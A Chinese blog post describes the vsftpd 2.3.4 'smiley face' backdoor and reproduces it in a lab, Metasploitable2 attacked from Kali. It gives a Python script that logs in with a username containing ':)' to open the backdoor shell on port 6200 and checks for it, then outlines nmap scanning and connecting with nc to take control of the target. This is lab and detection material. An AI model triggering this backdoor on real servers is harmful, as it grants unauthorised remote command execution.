脚本检测笑脸:)漏洞+复现

1 漏洞简介

        笑脸漏洞是vsftpd 2.3.4版本中开发者在软件里留下的后门漏洞,因为在登录时输入符号:)即可使服务开启6200端口,直接执行系统命令,符号酷似笑脸,因此称为笑脸漏洞。

        笑脸漏洞的代码如图:

2 检测代码

import socket
from ftplib import FTP

url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)'  # 用户名必须包含:)这两个字符
password = 'anonymous'  # 密码随便啥都行
try:
    ftp.connect(url, 21, timeout=2)  # 使用ftp登录,设置延时2秒
    ftp.login(username, password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket()  # 使用socket函数来检测是否有漏洞存在
    s.connect((url, 6200))
    s.close()
    print("发现微笑漏洞")
except:
    print("没有发现笑脸漏洞")

要在kali里面运行python文件,从而扫描得到结果。 

3 复现准备

  • 首先,要打开靶机Metasploitable2
  • 其次准备好攻击机kali

4 复现过程

  • 首先利用nmap进行探测,找到靶机ip。

  • 得到ip后,nmap扫描端口。

  • 探测到靶机21端口开放且版本是vsftpd 2.3.4,接着检测6200端口是否开放。 

  • 检测到6200端口关闭,使用命令ftp+ip打开端口。

  • 尽管没有返回,但是我们可以通过新开的控制窗口查看到6200端口已打开。

  • 打开后,我们便可以通过nc(瑞士军刀)连接靶机从而获得靶机的控制权,完成复现。 

        

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值